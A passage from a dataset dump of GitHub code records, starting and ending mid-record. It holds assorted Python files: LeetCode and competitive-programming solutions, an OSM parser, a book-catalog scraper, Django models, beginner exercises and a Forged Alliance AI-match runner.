mid\n\nprint(ok)\n\n\n\n'''\n時給の額を決めて二分探索。\n\n\n\n'''\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc026/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35645460318","text":"''''\nGiven a number of n return the index value of the Fibonacci sequence, where the sequence is:\n\n0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, ...\nthe pattern of the sequence is that each value is the sum of the previous values, that means that for N=5 -> 2+3\n\n'''\n\n\ndef fibonacciIterative(n):\n F = [0, 1]\n for idx in range(n):\n F[0], F[1] = F[1], F[0] + F[1]\n return F[0]\n\n\ndef fibonacciRecursive(n):\n '''\n let's say n = 4\n fibonacciRecursive(fibonacciRecursive(fibonacciRecursive(4)))\n\n 1. n=4 : fibonacciRecursive(fibonacciRecursive(f(3) + f(2))\n 2. n=3 : fibonacciRecursive(f(2) + f(1))\n 3. n=2 : 1\n\n '''\n if n <= 2:\n return 1\n return fibonacciRecursive(n-1) + fibonacciRecursive(n-2)\n\n\nprint(fibonacciIterative(8))\nprint(fibonacciRecursive(8))\n","repo_name":"ta-brook/DS-and-Algorithm","sub_path":"Algorithm/recursion/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10167286681","text":"#!/usr/bin/env python\n# coding=utf-8\n\n########################################################################\n#FileName: parking_parser.py\n#Author : Christian Göller, Jonas Bäuml, Simon Berger, Elias Häring \n#Last Modified On : 09.06.2023\n#Description : Parser for osm file to retrieve waypoints \n########################################################################\n\n\n\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\n\n\n# Function to parse an osm-file for the for us relevant information\n# In this case: Searching for points of street-lines and parking-lines \n# input: path to the osm-file as a string\n# output: list (total list of all ways) of lists (liste of all points of a way) of dictionaries (point\n# with x-, y- und z-coordinates) \n\n# Functionality:\n# 1. Search for all ways with the way types concerned\n# 2. Search for the ids of the points in the way\n# 3. search for ids, to get the coordinates of the points\n\ndef parse_osm(name):\n tree = ET.parse(name)\n root = tree.getroot()\n\n points = []\n ref = []\n i = 0\n # step 1\n for way in root.findall(\"way\"):\n type = \"\"\n for tag in way.findall(\"tag\"):\n if tag.attrib[\"k\"] == \"type\":\n type = tag.attrib[\"v\"]\n if type == \"parking_space\" or type == \"line_thin\":\n ref.append([])\n # step 2\n for nd in way.findall(\"nd\"):\n ref[i].append(nd.attrib[\"ref\"]) \n i += 1\n # step 3\n lines = []\n for re in ref:\n lines.append([])\n for r in re:\n for node in root.findall(\"node\"):\n point = {}\n if r == node.attrib[\"id\"]:\n for tag in node.findall(\"tag\"):\n if tag.attrib[\"k\"] == \"local_x\":\n point[\"x\"] = tag.attrib[\"v\"]\n elif tag.attrib[\"k\"] == \"local_y\":\n point[\"y\"] = tag.attrib[\"v\"]\n elif tag.attrib[\"k\"] == \"local_z\":\n point[\"z\"] = tag.attrib[\"v\"]\n lines[len(lines) -1].append(point)\n \n \n return lines\n","repo_name":"SimonBerger11/trajectory_planning","sub_path":"parking_parser.py","file_name":"parking_parser.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22685726226","text":"import time #importação da biblioteca tempo\n\ndef countdown(t): #função countdown\n print('Countdown: \\n')\n while t: # enquanto tiver 't' = tempo\n mins, secs = divmod(t, 60) # divisor\n timer = '{0}' ':' '{1}'.format(mins , secs) # formatação para o countdowcar\n print(timer, end=\"\\r\") # exibição do countdown\n time.sleep(1) # Intervalo\n t -= 1 #Regressão\n \n print('Tempo completo!') # Mensagem ao esgotar o tempo\n \nt = int(input('Digite o tempo em segundos:\\n')) # Entrada dos segundo desejados\ncountdown(t) # Chamada para função","repo_name":"0CMat/Projetos-Python","sub_path":"Contagem Regressiva/countdown-timer.py","file_name":"countdown-timer.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38131595939","text":"import collections\nimport math\nfrom typing import List\n\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n set_ans = set()\n\n def backtracking(cur, idx):\n if cur not in set_ans:\n set_ans.add(cur)\n if idx < len(nums):\n backtracking(cur, idx + 1)\n cur += str(nums[idx]) + ','\n backtracking(cur, idx + 1)\n\n backtracking('', 0)\n ans = []\n for i in set_ans:\n tmp = i.split(',')\n if tmp:\n tmp.pop()\n ans.append([int(i) for i in tmp])\n\n return ans\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n test_cases = [\n [1, 2, 3],\n [1],\n [1, -2, 10],\n ]\n for i in test_cases:\n print(sol.subsets(i))\n\n\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc1-100/lc78/Subsets.py","file_name":"Subsets.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74222584808","text":"class Solution:\n def tallestBillboard(self, rods: List[int]) -> int:\n ans={}\n \n def rec(i,diff):\n if (i,diff) in ans:\n return ans[(i,diff)]\n if i>=len(rods):\n if diff:\n return -float('inf')\n return 0\n long=rec(i+1,diff+rods[i])\n skip=rec(i+1,diff)\n short=rec(i+1,diff-rods[i])+rods[i]\n ans[(i,diff)]=max(long,skip,short)\n return ans[(i,diff)]\n return rec(0,0)","repo_name":"abhi-apple/leetcode","sub_path":"0956-tallest-billboard/0956-tallest-billboard.py","file_name":"0956-tallest-billboard.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20031223468","text":"import aiohttp\nimport asyncio\nimport json\nimport os\nimport time\n\nfrom bs4 import BeautifulSoup as bs\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\nPATH_TO_JSON_FILE_BOOK = os.path.join(BASE_DIR, \"data/book_data.json\")\nPATH_TO_JSON_FILE_AUTHOR = os.path.join(BASE_DIR, \"data/author_data.json\")\nBASE_URL = \"https://book24.ru\"\n\nON_WRITE = []\nON_WRITE_AUTHORS = []\n\n\ndef get_soup(html):\n soup = bs(html, 'html.parser')\n return soup\n\nasync def connect(url, session):\n async with session.get(url) as response:\n print(f\"Connect to {url}\")\n html = await response.text()\n return html\n\n\ndef write_data():\n print(f\"===== {len(ON_WRITE)} OBJECTS WRITED IN JSON FILE ======\")\n with open(f\"{PATH_TO_JSON_FILE_BOOK}\", \"w\") as file:\n json.dump(ON_WRITE, file, indent=2, ensure_ascii=False)\n\ndef write_data_author():\n print(f\"===== {len(ON_WRITE_AUTHORS)} OBJECTS WRITED IN JSON FILE ======\")\n with open(f\"{PATH_TO_JSON_FILE_AUTHOR}\", \"w\") as file:\n json.dump(ON_WRITE_AUTHORS, file, indent=2, ensure_ascii=False)\n\ndef get_book_name(soup):\n try:\n book_name = soup.select_one(\".item-detail__title\").text\n except:\n book_name = None\n\n return book_name\n\ndef get_book_description(soup):\n try:\n description = soup.select_one(\".collapse-panel__text.js-collapse-text .text-block-d\")\n except:\n description = None\n\n text = \"\"\n if description:\n for desc in description.select(\"p\"):\n text += desc.text + '\\n\\n'\n\n return text\n\ndef get_params(soup):\n try:\n params = soup.select(\".item-tab__chars-item\")\n except:\n params = None\n\n return params\n\ndef get_lable(param):\n try:\n lable = param.select_one(\".item-tab__chars-key\").text\n except:\n lable = None\n\n return lable\n\ndef get_author(param):\n try:\n author_name = param.select_one(\".item-tab__chars-value a\").text\n except:\n author_name = None\n\n if author_name:\n try:\n author_url = param.select_one(\".item-tab__chars-value a\")['href']\n except KeyError:\n author_url = param.select_one(\".item-tab__chars-value a\")['data-link']\n except:\n author_url = None\n\n return [{\"name\": author_name, \"url\": author_url}]\n return author_name\n\ndef get_genre(param):\n try:\n genre_name = param.select_one(\".item-tab__chars-value a\").text\n except:\n genre_name = None\n\n return genre_name\n\ndef get_author_and_genre(soup):\n params = get_params(soup)\n\n author_name = None\n genre_name = None\n\n if params:\n for param in params:\n lable = get_lable(param)\n if lable == \"Автор:\":\n author_name = get_author(param)\n if lable == \"Раздел:\":\n genre_name = get_genre(param)\n\n return author_name, genre_name\n\n\ndef get_book_image_url(soup):\n try:\n book_image_url = soup.select_one(\".item-cover__item:nth-child(1) img\")['src']\n except:\n book_image_url = None\n\n return book_image_url\n\nasync def pars_book(html):\n\n soup = get_soup(html)\n\n book_name = get_book_name(soup)\n description = get_book_description(soup)\n author_name, genre_name = get_author_and_genre(soup)\n book_image_url = get_book_image_url(soup)\n\n data = {\n \"author\": author_name,\n \"genre\": genre_name,\n \"book_name\": book_name,\n \"description\": description,\n \"image_url\": book_image_url\n }\n print(f\"# {book_name}....... ADDED FOR WRITE\")\n print(f\" Author: {data['author']}\")\n print(f\" Genre: {data['genre']}\")\n print(f\" Image Url: {data['image_url']}\")\n ON_WRITE.append(data)\n\n\nasync def get_data_books(soup):\n try:\n books = soup.select(\".book__image-link.js-item-element.ddl_product_link\")\n return books\n except Exception as e:\n raise Exception(\n \"# ERROR: This page is have not books!\"\n )\n\nasync def base_page():\n\n url = \"https://book24.ru/catalog/\"\n async with aiohttp.ClientSession() as session:\n html = await connect(url, session)\n soup = get_soup(html)\n\n books = soup.select(\".book__image-link.js-item-element.ddl_product_link\")\n\n return books\n\n\nasync def pars_catalog():\n\n books = await base_page()\n\n urls = []\n async with aiohttp.ClientSession() as session:\n for book in books:\n book_url = asyncio.create_task(connect(BASE_URL + book['href'], session))\n urls.append(book_url)\n\n htmls = await asyncio.gather(*urls)\n\n tasks = []\n for html in htmls:\n task = asyncio.create_task(pars_book(html))\n tasks.append(task)\n\n await asyncio.gather(*tasks)\n\n write_data()\n\ndef get_author_name(soup):\n try:\n author_name = soup.select_one(\".author-item__title\").text\n except:\n author_name = None\n\n return author_name\n\ndef get_author_description(soup):\n try:\n description = soup.select_one(\".text-block-d\").text.strip()\n except:\n description = None\n\n return description\n\ndef get_author_image_url(soup):\n try:\n author_image_url = soup.select_one(\".author-item__pic img\")['src']\n except:\n author_image_url = None\n\n return author_image_url\n\nasync def pars_author(html):\n soup = get_soup(html)\n\n author_name = get_author_name(soup)\n description = get_author_description(soup)\n author_image_url = get_author_image_url(soup)\n\n data = {\n \"name\": author_name,\n \"description\": description,\n \"image_url\": author_image_url\n }\n print(f\"# {author_name}....... ADDED FOR WRITE\")\n print(f\" Image Url: {data['image_url']}\")\n ON_WRITE_AUTHORS.append(data)\n\n\ndef get_authors_urls_from_book_data():\n url_list = []\n with open(f\"{PATH_TO_JSON_FILE_BOOK}\", \"r\") as file:\n data = json.load(file)\n for d in data:\n if d['author'] and d['author'][0]['url']:\n url_list.append(d['author'][0]['url'])\n return url_list\n\nasync def pars_authors():\n\n author_urls = get_authors_urls_from_book_data()\n\n urls = []\n async with aiohttp.ClientSession() as session:\n for author_url in author_urls:\n author_url = asyncio.create_task(connect(BASE_URL + author_url, session))\n urls.append(author_url)\n\n htmls = await asyncio.gather(*urls)\n\n tasks = []\n for html in htmls:\n task = asyncio.create_task(pars_author(html))\n tasks.append(task)\n\n await asyncio.gather(*tasks)\n\n write_data_author()\n\n\n\ndef main():\n\n asyncio.run(pars_catalog())\n asyncio.run(pars_authors())\n","repo_name":"MGDas/DjangoBook","sub_path":"app/scrap/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23365397873","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom snownlp import SnowNLP\n\ns = SnowNLP(u'这个东西真心很赞')\n\ns.words # [u'这个', u'东西', u'真心',\n# u'很', u'赞']\n\ns.tags # [(u'这个', u'r'), (u'东西', u'n'),\n# (u'真心', u'd'), (u'很', u'd'),\n# (u'赞', u'Vg')]\n\ns.sentiments # 0.9769663402895832 positive的概率\n\ns.pinyin # [u'zhe', u'ge', u'dong', u'xi',\n# u'zhen', u'xin', u'hen', u'zan']\n\ns = SnowNLP(u'「繁體字」「繁體中文」的叫法在臺灣亦很常見。')\n","repo_name":"rogerjms/PyNLP","sub_path":"snowNLP.py","file_name":"snowNLP.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"fa","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16006346043","text":"from django.db import models\n\n# Create your models here.\n\n#表名为类名\nclass Grades(models.Model):\n #不指定主键,自动创建自增长的主键\n #属性为字段\n gname = models.CharField(max_length=20)\n gdate = models.DateField()\n ggirlsum = models.IntegerField()\n gboysum = models.IntegerField()\n isDelete = models.BooleanField()\n # def __str__(self):\n # return \"{}-{}-{}-{}-{}\".format(self.gname,self.gdate,self.ggirlsum,self.gboysum,self.isDelete)\n def __str__(self):\n return \"{}:{}\".format(self.gname,self.gdate)\n\nclass StudentsManager(models.Manager):\n def get_queryset(self):\n # 改写父类中的get_queryset() 带过滤object.all()\n return super(StudentsManager,self).get_queryset().filter(isDelete=False)\n# 类方法创建对象。cls为student 楼下。两种方法\n# 在管理器中添加\n def createstudent(self,name,gender,age,contend,isD,grade):\n stu = self.model()\n stu.sname = name\n stu.sgender = gender\n stu.sage = age\n stu.sconend = contend\n stu.isDelete = isD\n stu.sgrade = grade\n return stu\n\n\nclass Students(models.Model):\n #自定义模型管理器\n stuObj = models.Manager()\n stuObj2 = StudentsManager()\n sname = models.CharField(max_length=20)\n sgender = models.BooleanField(default=True)\n sage = models.IntegerField()\n sconend = models.CharField(max_length=20)\n isDelete = models.BooleanField(default=False)\n #关联外键,需要指定。为了避免两个表里的数据不一致问题\n sgrade = models.ForeignKey(\"Grades\",on_delete=models.CASCADE)\n def __str__(self):\n return self.sname ,self.sage\n # class Meta:\n # 定义表名 ,默认为:应用_表名\n # db_table = 'students'\n #表排序正序['id'],倒序[-'id']\n # ordering=['id']\n# 最后一次修改时间\n# modles.DataTimeField(auto_now=Ture)\n# 创建时间\n# modles.DataTimeField(auto_now_add=Ture)\n #类方法创建对象。cls为student\n # 在管理器中添加, 楼上 .两种方法\n @classmethod\n def createStudent(cls,name,gender,age,contend,isD,grade):\n stu = cls(sname = name,sgender=gender,sage=age,sconend=contend,isDelete=isD,sgrade=grade)\n return stu\n\n\n \n\n\n\n","repo_name":"fclm1316/mydjango","sub_path":"myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21051855242","text":"import z3\nimport json\nimport torch\nfrom Doping.pytorchtreelstm.treelstm import calculate_evaluation_orders\n# from Doping.PySpacerSolver.utils import *\nimport os\nimport numpy as np\nimport glob\nimport argparse\nimport sys\nimport matplotlib.pyplot as plt\nimport logging\n# def get_exp_name(prefix, exp_folder, vis, use_c, use_const_emb, use_dot_product, max_size, shuffle, negative_sampling_rate, threshold, dropout_rate):\ndef get_exp_name(configs, prefix = \"\"):\n '''\n construct a meaningful exp_name for the Tensorboard\n '''\n exp_name = [prefix]\n #exp_folder is in the form\n #\"PySpacerSolver/MEDIA/backward_encoded_split_on_relu.smt2_250220_13_04_22/ind_gen_files/\"\n # exp_name.append(exp_folder.split(\"/\")[-3])\n for k in configs:\n if k in [\"input_folders\", \"checkpoint\"]: #do not put those parameters to the model name\n continue\n else:\n exp_name.append(configs[k][2])\n if isinstance(configs[k][0], bool):\n exp_name.append(str(int(configs[k][0])))\n else:\n exp_name.append(str(configs[k][0]))\n\n return \"_\".join(exp_name)\n\ndef json_to_markdown(data):\n result = \"\"\n for key in data:\n result += \"### %s\\n\"%key\n result += \"```\\n\"\n result += \"%s\"%(str(data[key]).replace(\"\\n\", \"\\n\\n\"))\n result += \"\\n```\"\n result += \"\\n\"\n\n return result\n\ndef get_seed_file(seed_path):\n if seed_path is None:\n return None\n print(\"\\t\\tIn get seed file\")\n seed_files = glob.glob(seed_path+\"/pool_solver*.smt2\")\n if(len(seed_files)==0):\n return None\n seed_files = sorted(seed_files)\n print(seed_files)\n seed_file = seed_files[0]\n return seed_file\n\n\ndef display_example(filename, true_label, pred_label, value):\n label_texts = [\"SAME COLOR\", \"DIFFERENT COLOR\"]\n with open(filename, \"r\") as dp:\n datapoint = json.load(dp)\n label_in_file = datapoint[\"label\"]\n assert(label_in_file == true_label)\n\n C_tree = datapoint[\"C_tree\"]\n L_a_tree = datapoint[\"L_a_tree\"]\n L_b_tree = datapoint[\"L_b_tree\"]\n\n C_tree_expr = C_tree[\"children\"][0][\"expr\"]\n L_a_tree_expr = L_a_tree[\"children\"][0][\"expr\"]\n L_b_tree_expr = L_b_tree[\"children\"][0][\"expr\"]\n\n\n result = {}\n result[\"filename\"] = \"...\" + filename[-20:]\n result[\"C_tree_expr\"] = C_tree_expr\n result[\"L_a_tree_expr\"] = L_a_tree_expr\n result[\"L_b_tree_expr\"] = L_b_tree_expr\n result[\"value\"] = value\n result[\"pred_label\"] = label_texts[pred_label]\n result[\"true_label\"] = label_texts[label_in_file]\n\n #Tensorboard use markdown to render text\n return json_to_markdown(result)\n\ndef calculate_P(X, L, L_freq):\n idx2freq = {}\n for k in L:\n idx = L[k]\n freq = L_freq[k]\n\n idx2freq[idx] = freq\n print(len(X), len(L), len(L_freq))\n assert(len(X)==len(L)==len(L_freq))\n P_matrix = np.zeros((len(X), len(X)))\n for i in range(len(X)):\n for j in range(len(X)):\n #P_matrix[i][j] = P(lit_i|lit_j)\n P_matrix[i][j] = X[i][j]/idx2freq[j]\n assert(P_matrix[i][j]<=1 )\n\n return P_matrix\n\ndef visualize_X(filename, key):\n with open(filename, \"r\") as f:\n data = json.load(f)[key]\n fig, ax = plt.subplots()\n im = ax.imshow(data)\n ax.set_title(filename)\n ax.set_xticks(np.arange(.5, len(data), 10))\n ax.set_yticks(np.arange(.5, len(data), 10))\n ax.set_xticklabels(np.arange(1, len(data), 10))\n ax.set_yticklabels(np.arange(1, len(data), 10))\n ax.grid(color='w', linestyle='-', linewidth=1)\n plt.show()\n\ndef parser_from_template(json_config_template = \"/home/nle/workspace/Doping/exp_config_template.json\"):\n with open(json_config_template, \"r\") as f:\n config_template = json.load(f)\n parser = argparse.ArgumentParser()\n for key in config_template:\n if key==\"input_folders\":\n continue\n long_name = key\n short_name = config_template[key][2]\n arg_type = type(config_template[key][0])\n help_text = config_template[key][1]\n if arg_type==bool:\n parser.add_argument(\"-{}\".format(short_name),\n \"--{}\".format(long_name),\n default = None,\n help = help_text,\n action = 'store_true')\n else:\n parser.add_argument(\"-{}\".format(short_name),\n \"--{}\".format(long_name),\n default = None,\n type = arg_type,\n help = help_text)\n return parser\n\ndef plot_to_tensorboard(writer, fig, step):\n \"\"\"\n Takes a matplotlib figure handle and converts it using\n canvas and string-casts to a numpy array that can be\n visualized in TensorBoard using the add_image function\n\n Parameters:\n writer (tensorboard.SummaryWriter): TensorBoard SummaryWriter instance.\n fig (matplotlib.pyplot.fig): Matplotlib figure handle.\n step (int): counter usually specifying steps/epochs/time.\n \"\"\"\n\n # Draw figure on canvas\n fig.canvas.draw()\n\n # Convert the figure to numpy array, read the pixel values and reshape the array\n img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n # Normalize into 0-1 range for TensorBoard(X). Swap axes for newer versions where API expects colors in first dim\n img = img / 255.0\n # img = np.swapaxes(img, 0, 2) # if your TensorFlow + TensorBoard version are >= 1.8\n\n # Add figure in numpy \"image\" to TensorBoard writer\n writer.add_image('confusion_matrix', img, step)\n plt.close(fig)\n\n\ndef create_logger(lvl, name, outstream = 'stderr'):\n logger = logging.getLogger(name)\n logger.setLevel(getattr(logging, lvl))\n formatter = logging.Formatter('%(name)s:%(levelname)s: %(message)s')\n if outstream == 'stderr':\n handler = logging.StreamHandler(sys.stderr)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n \n return logger\n","repo_name":"nhamlv-55/Ropey","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73922097768","text":"# Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of the tree, and every node has no left child and only one right child.\n\n\n# Example 1:\n\n\n# Input: root = [5, 3, 6, 2, 4, null, 8, 1, null, null, null, 7, 9]\n# Output: [1, null, 2, null, 3, null, 4, null,\n# 5, null, 6, null, 7, null, 8, null, 9]\n# Example 2:\n\n\n# Input: root = [5, 1, 7]\n# Output: [1, null, 5, null, 7]\n\n\n# Constraints:\n\n# The number of nodes in the given tree will be in the range[1, 100].\n# 0 <= Node.val <= 1000\n\nclass Solution:\n def increasingBST(self, root: TreeNode) -> TreeNode:\n dummy = TreeNode()\n self.current = dummy\n\n def dfs(root):\n if not root:\n return None\n dfs(root.left)\n root.left = None\n self.current.right = root\n self.current = root\n dfs(root.right)\n\n dfs(root)\n return dummy.right\n","repo_name":"jHuang30/Ds-and-Algo-in-Python","sub_path":"897. Increasing Order Search Tree.py","file_name":"897. Increasing Order Search Tree.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13516586849","text":"# 1、编写一个函数,用于判断一个字符串是不是回文字符串,返回True或False\n# 回文数:从头到尾、从尾到头,都是一样的\n# 例:abba、abccba、aaa\ndef judge(content):\n # return content == content[::-1]\n\n # return content == ''.join(reversed(content))\n\n reversed_content = ''\n index = len(content) - 1\n while index >= 0:\n reversed_content += content[index]\n index -= 1\n return content == reversed_content\n\n\nprint(judge('abba'))\nprint()\n\ntest_cases = [\"abba\", \"abccba\", \"——aaa——\", \"JBbj\", \"JBA A BJ\", \"1221\", \"12aa 21\", \"2345\"]\nfor s in test_cases:\n print(judge(s))\nprint()\n\n\n# 2、编写一个函数,参数为1个字符串,对于其中重复出现的字符,只保留第一次出现的;返回去除之后的字符串\n# 例:abcdabce ——> abcde\ndef remove_repeat(content):\n result = ''\n for x in content:\n if x not in result:\n result += x\n return result\n\n\nprint(remove_repeat('abcdabce'))\nprint()\n\n\n# 3、编写一个函数,参数为1个字符串,对于其中重复出现的字符,全部删除;返回去除之后的字符串\n# 例:abcdabce ——> de\ndef remove_repeat2(content):\n result = ''\n for x in content:\n if content.count(x) == 1:\n result += x\n return result\n\n\ndef remove_repeat3(content):\n result = ''\n\n count_dict = {}\n for x in content:\n if x not in count_dict:\n count_dict[x] = 1\n else:\n count_dict[x] += 1\n\n for x in content:\n if count_dict[x] == 1:\n result += x\n\n return result\n\n\nprint(remove_repeat2('abcdabce'))\nprint(remove_repeat3('abcdabce'))\nprint()\n\n\n# 4、编写一个函数,参数为一个都是数字的列表,根据数字的绝对值进行排序;返回排序后的列表\n# 例:[1, -6, 2, -5, 9, 4, 20, -3] ——> [1, 2, -3, 4, -5, -6, 9, 20]\ndef rank_list(num_list):\n # return sorted(num_list, key=lambda x: abs(x))\n # return sorted(num_list, key=lambda x: x if x > 0 else 0 - x)\n\n count_dict = {}\n for num in num_list:\n if num in count_dict:\n count_dict[num] += 1\n else:\n count_dict[num] = 1\n\n num_dict = {}\n for num in num_list:\n if num >= 0:\n num_dict[num] = num\n else:\n num_dict[num] = 0 - num\n dict_sorted = sorted(num_dict.items(), key=lambda x: x[1])\n # return [item[0] for item in dict_sorted]\n\n result = []\n for item in dict_sorted:\n value = item[0]\n for i in range(0, count_dict[value]):\n result.append(value)\n return result\n\n\nprint(rank_list([1, -6, 2, -2, -5, -2, 9, 4, 20, -3]))\nprint()\n\n\n# 5、编写一个函数,参数为2个字典,合并2个字典为1个字典,返回合并后的字典\n# 例:\n# 1 {'a': 1, 'b': 2, 'c': 3}\n# 2 {'b': 1, 'c': 2, 'd': 3}\n# ——> {'a': 1, 'b': 3, 'c': 5, 'd': 3}\ndef merge_dict(dict1, dict2):\n for key in dict2.keys():\n if key in dict1:\n dict1[key] += dict2[key]\n else:\n dict1[key] = dict2[key]\n return dict1\n\n # for key in dict1:\n # if key in dict2:\n # dict2[key] += dict1[key]\n # else:\n # dict2[key] = dict1[key]\n # return dict2\n\n\ndict1 = {'a': 1, 'b': 2, 'c': 3}\nprint(merge_dict(dict1, {'b': 1, 'c': 2, 'd': 3}))\nprint()\n\n# dict1 = {'a': 1, 'b': 2, 'c': 3}\n# dict2 = {'b': 1, 'c': 2, 'd': 3}\n# dict3 = {}\n#\n# for key in set(dict1) | set(dict2):\n# # 用get 从 dict1&dict2 中获取对应键的值 如果键不存在 返回默认值0\n# dict1_value = dict1.get(key,0)\n# dict2_value = dict2.get(key,0)\n# dict3[key] = dict1_value + dict2_value\n#\n# print(dict3)\n\n\n# # 6、编写一个函数,参数为一个数字,作为行数,打印出'*'构成的等腰三角形\n# # 例,4行\n# * 1 = 2 * 1 - 1, 3 = 4 - 1\n# *** 3 = 2 * 2 - 1, 2 = 4 - 2\n# ***** 5 = 2 * 3 - 1, 1 = 4 - 3\n# ******* 7 = 2 * 4 - 1, 0 = 4 - 4\ndef print_star_tree(line_num):\n for i in range(1, line_num + 1):\n star_num = 2 * i - 1\n space_num = line_num - i\n\n for j in range(0, space_num):\n print(' ', end='')\n for j in range(0, star_num):\n print('*', end='')\n print()\n\n\nprint_star_tree(4)\nprint()\n\n\n# 7、打印99乘法表\n# 1x1=1\n# 1x2=2 2x2=4\n# 1x3=3 2x3=6 3x3=9\n# 1x4=4 2x4=8 3x4=12 4x4=16\n# 1x5=5 2x5=10 3x5=15 4x5=20 5x5=25\n# 1x6=6 2x6=12 3x6=18 4x6=24 5x6=30 6x6=36\n# 1x7=7 2x7=14 3x7=21 4x7=28 5x7=35 6x7=42 7x7=49\n# 1x8=8 2x8=16 3x8=24 4x8=32 5x8=40 6x8=48 7x8=56 8x8=64\n# 1x9=9 2x9=18 3x9=27 4x9=36 5x9=45 6x9=54 7x9=63 8x9=72 9x9=81\ndef print_nine_nine():\n for i in range(1, 10):\n for j in range(1, i + 1):\n print(str(j) + \"x\" + str(i) + \"=\" + str(i * j) + ' ', end='')\n print()\n\n\nprint_nine_nine()\n","repo_name":"jwu12351/Python101","sub_path":"exam/exam1.py","file_name":"exam1.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5340762253","text":"import json\nimport logging\nimport random\nimport string\nimport subprocess\nimport time\nfrom collections import defaultdict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom pathlib import Path\n\nfrom _autorun.install import is_installed\nfrom _autorun.util import confirm, get_faforever_dir\nfrom experiments import experiments\n\ntry:\n import pygetwindow as gw\nexcept ImportError:\n gw = None\n\nlog = logging.getLogger(__name__)\n\n\nfactions = {\n \"random\": 0,\n \"uef\": 1,\n \"aeon\": 2,\n \"cybran\": 3,\n \"seraphim\": 4,\n}\n\nimport os, multiprocessing, psutil\n\nclass Affinity:\n def __init__(self):\n self.cpus = {\n i: False for i in range(1,psutil.cpu_count())\n }\n self.pids = {}\n self.lock = multiprocessing.Lock()\n def start(self,pid):\n with self.lock:\n i = random.choice([x for x in self.cpus if not self.cpus[x]])\n self.cpus[i] = True\n self.pids[pid] = i\n psutil.Process(pid).cpu_affinity([i])\n def end(self,pid):\n with self.lock:\n i = self.pids[pid]\n del self.pids[pid]\n self.cpus[i] = False\n\nAFFINITY = Affinity()\n\ndef run_batch(args):\n start = time.time()\n faf_dir = get_faforever_dir()\n log_dir = Path.cwd() / \"logs\"\n\n if not args.obnoxious and gw is None:\n log.warning(\"Can't minimize windows because pygetwindow is not installed!\")\n return\n\n if not args.yes and not is_installed(faf_dir):\n if not confirm(\n \"Autorun does not appear to be installed, do you want to run the \"\n \"experiments anyway?\"\n ):\n log.debug(\"Cancelling...\")\n return\n\n if not log_dir.exists():\n log_dir.mkdir()\n\n if args.dry_run:\n print(len(experiments))\n print(ai_test_arg(experiments[0].ais))\n exit()\n\n futures = []\n with ThreadPoolExecutor(max_workers=args.num_threads if not args.use_affinity else min(psutil.cpu_count(),args.num_threads)) as executor:\n for experiment in experiments:\n fut = executor.submit(\n run_experiment,\n faf_dir,\n ais=experiment.ais,\n map_name=experiment.map,\n max_time=args.max_game_time,\n log_dir=log_dir,\n use_affinity=args.use_affinity\n )\n futures.append(fut)\n\n if not args.obnoxious:\n for w in gw.getWindowsWithTitle(\"Forged Alliance\"):\n if not w.isMinimized:\n w.minimize()\n\n time.sleep(10)\n\n if args.delete_logs:\n for path in log_dir.iterdir():\n if path.is_file() and path.suffix == \".sclog\":\n path.unlink()\n\n results = [fut.result(0) for fut in futures]\n if args.save_results:\n with open(\"results.json\",\"a\") as f:\n for res in results:\n f.write(json.dumps(res))\n f.write(\"\\n\")\n else:\n for result in results:\n print(json.dumps(result))\n print(time.time()-start)\n\n\ndef run_experiment(\n faf_dir,\n ais,\n map_name,\n max_time,\n log_dir,\n use_affinity,\n init_name=\"init_autorun.lua\"\n):\n bin = faf_dir / \"bin\"\n\n log_id = \"\".join(random.choice(string.hexdigits) for _ in range(8))\n log_name = log_dir / (\"log_\" + log_id)\n log_file = log_name.with_suffix(\".sclog\")\n\n args = [\n bin / \"ForgedAlliance.exe\",\n \"/nobugreport\",\n \"/nosound\",\n \"/exitongameover\",\n \"/init\", bin / init_name,\n \"/map\", map_name,\n \"/log\", log_name,\n \"/maxtime\", str(max_time),\n \"/aitest\", ai_test_arg(ais)\n 